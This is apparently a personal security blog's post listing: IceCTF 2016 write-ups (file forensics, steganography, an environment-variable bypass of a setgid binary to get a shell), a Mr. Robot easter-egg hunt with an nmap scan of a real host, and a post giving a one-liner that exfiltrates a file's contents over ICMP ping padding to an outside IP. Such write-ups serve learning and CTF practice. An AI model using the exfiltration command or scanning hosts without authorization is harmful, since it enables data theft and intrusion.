Posts

  1. IceCTF 2016 - Blue Monday


    Challenge Description:

    Those who came before me lived through their vocations From the past until completion, they'll turn away no more And still I find it so hard to say what I need to say But I'm quite sure that you'll tell me just how I should feel today. A file download was given for this challenge. Running file yielded the following result:

    → file blue_monday.mid
    blue_monday.mid: Standard MIDI data (format 1) using 1 track at 1/220
    

    Assuming it actually was MIDI, I opened it up in audacity with no luck. It was just a bunch of constant tones. This was at about 2:30AM so as a last effort before bed I just catted the file:

    → cat blue_monday.mid
    MThdTrkId\Icd\ced\eCd\CTd\TFd\F{d\{Hd\HAd\Acd\ckd\k1d\1nd\n9d\9_d\_md\mUd\U5d\5Id\Icd\c_d\_Wd\W1d\17d\7hd\h_d\_md\mId\IDd\D1d\15d\5_d\_Ld\L3d\3td\t5d\5_d\_Hd\H4d\4vd\vEd\E_d\_ad\a_d\_rd\r4d\4vd\v3d\3}d\}h/
    

    The point of interest here for me was that it looked like the beginning was spelling IceCTF{ but with extra characters in between. I loaded it up into ipython and ended up with this snippet to solve it:

    with open("blue_monday") as f:
        print(''.join([i for i in f.read() if ord(i)<127 and ord(i)>0x10 and i!='\\' and i !='d'])[7:][:-2][::2])
    

    Basically this just removes any character that is non-ascii, a backslash, or d, and then cuts off the first 7 characters (the header) and the last 2, and then takes every other character. They had just embedded the flag into a working MIDI file it seems. Anyway, when you run this it prints the flag: IceCTF{HAck1n9_mU5Ic_W17h_mID15_L3t5_H4vE_a_r4v3}

  2. IceCTF 2016 - Corrupt Transmission


    Challenge description:

    We intercepted this image, but it must have gotten corrupted during the transmission. Can you try and fix it?

    For this challenge a file with the extension .png was provided. A common CTF challenge is to corrupt some part of an image, so the solution is to fix it! I started with the header. According to Wikipedia the file header is supposed to start with 89 50 4E 47 0D 0A 1A 0A. Looking at the file using xxd we can see that this png does not start with those bytes:

    → xxd corrupt_orig.png | head -1
    00000000: 9050 4e47 0e1a 0a1b 0000 000d 4948 4452  .PNG........IHDR
    

    The first byte and bytes 5-8 are wrong. To fix, I opened the image up in hexedit and changed the bytes to their correct values. Opening the file provided a valid image:

    flag

    And of course, the flag: IceCTF{t1s_but_4_5cr4tch}

  3. IceCTF 2016 - Demo


    Challenge description:

    I found this awesome premium shell, but my demo version just ran out... can you help me crack it? /home/demo/ on the shell. The source for this challenge was provided:

    #define _GNU_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <libgen.h>
    #include <string.h>
    
    void give_shell() {
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
        system("/bin/sh");
    }
    
    int main(int argc, char *argv[]) {
        if(strncmp(basename(getenv("_")), "icesh", 6) == 0){
            give_shell();
        }
        else {
            printf("I'm sorry, your free trial has ended.\n");
        }
        return 0;
    }
    

    So to get the flag we need to make the _ shell variable equal icesh. The _ shell variable in bash is always set to the program name of the command being run. So I decided to use a different shell to see what would happen.

    sh
    ls icesh; /home/demo/demo
    cat flag.txt
    IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}
    

    And there we have our flag: IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}

  4. IceCTF 2016 - Thor is a hacker now


    Challenge description:

    Thor has been staring at this for hours and he can't make any sense out of it, can you help him figure out what it is?

    The text file provided is just a hexdump produced with xxd. xxd actually has a feature to reverse a hexdump back into the original file, from there I identified the resulting file's format with the file command. It was an lzip. Extracting the lzip resulted in the following image:

    thor

    Flag:

    IceCTF{h3XduMp1N9_l1K3_A_r341_B14Ckh47}

    Commands that were run in order:

     xxd -r thor.txt > thor.bin
    → file thor.bin
    thor.bin: lzip compressed data, version: 1
    lzip -d thor.bin
    → file thor.bin.out
    thor.bin.out: JPEG image data, JFIF standard 1.01
    → mv thor.bin.out thor.jpg
    
  5. IceCTF 2016 - Vape Nation


    Challenge description:

    Go Green!

    They provide a png called vape_nation.png:

    vape nation

    With the hint I figured it must be a green filter of some sort so I loaded up Stegsolve and checked out the green plane filters. Green plane 0 resulted in the following:

    solved nation

    Looks like a flag :)

    IceCTF{420_CuR35_c4NCEr}

  6. Mr. Robot Season 2 Episode 4 Easter Egg


    After seeing the last Mr. Robot easter egg from season 2 episode 1 I have been on the lookout for IP's and domains to try and go after. At the end of season 2 episode 4 (init_1.asec) Elliot logs into an IRC server and the IP address is clearly visible as 192.251.68.53. ip

    I decided to scan that host with nmap and got the following results:

     sudo nmap -sS -Pn -sV -n 192.251.68.253
    Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-28 08:46 EDT
    Nmap scan report for 192.251.68.253
    Host is up (0.023s latency).
    Not shown: 996 filtered ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp?
    80/tcp   open  http-proxy  F5 BIG-IP load balancer http proxy
    554/tcp  open  rtsp?
    7070/tcp open  realserver?
    Service Info: Device: load balancer
    

    HTTP up, cool. I went to the site and it was a fake IRC server with the hostname irc.colo-solutions.net: irc

    After it logged me in as D0loresH4ze I was dropped in a channel called #th3g3ntl3man with the all too familiar samsepi0l (for the uninformed, Sam Sepiol was the alias Elliot used in season one to gain access to Steel Mountain, a secure datacenter).

    After poking around and trying to get samsepi0l to say something besides "i don't have time for this right now." I played the roll of Darlene and entered what she said in the show: input

    Here is the respone I got: response

    they have changed their standard issue. we have a way in.

    What does that even mean? At the end of the episode this line of dialogue was not shown. Only wait for my instructions was. The scene after shows a news article from Business Insider titled FBI gives up Blackberry for Android. I assume that is their "standard issue" and he is going to hack into them via their smartphones. That's a bold move, we'll see how it plays out next week.

    After this I investigated a couple of other addresses I found (192.251.68.240, 104.97.14.93, 192.251.68.249, irc.eversible.co) but none of them turned up anything. I looked at the page source too, hoping to find something hidden in the javascript or HTML. Nothing there either... I guess we will just have to wait and see where this goes! I'll probably take a closer look at this after work, but I thought this would be cool to share now.

  7. Metasploit Workflows and Scripting


    Here is a presentation I gave at GVSU on 7/20/16 about the basics of metasploit and automation using pymetasploit

    The code for autopsexec is not public right now because it is a mess. I'll update this post when I fix it!

  8. Data Exfiltration with Ping


    I was looking around Twitter the other day and someone had posted something similar to this. I don't remember who you are, but this is a neat trick so I wanted to share it. How to exfiltrate data from a network using the padding of ICMP echo request packets.

    Sending data

    base64 important-data.txt | xxd -ps -c 16 | while read i; do ping -c1 -s32 -p $i 8.8.8.8; done
    

    This will base64 encode important-data.txt and then stuff the encoded data 16 bytes at a time into ping.

    Obviously you should change the IP before sending :)

    Receiving data

    You can grab the data off the wire using scapy. Here's a short little script that takes an out file name as the first argument and then an optional interface name to listen on as the second argument.

    That's all for now.

  9. Hello World


    Finally finished this new blog. It's all static now so that's good.

    I was on wordpress before and it was terrible. Hopefully I can put some cool stuff here!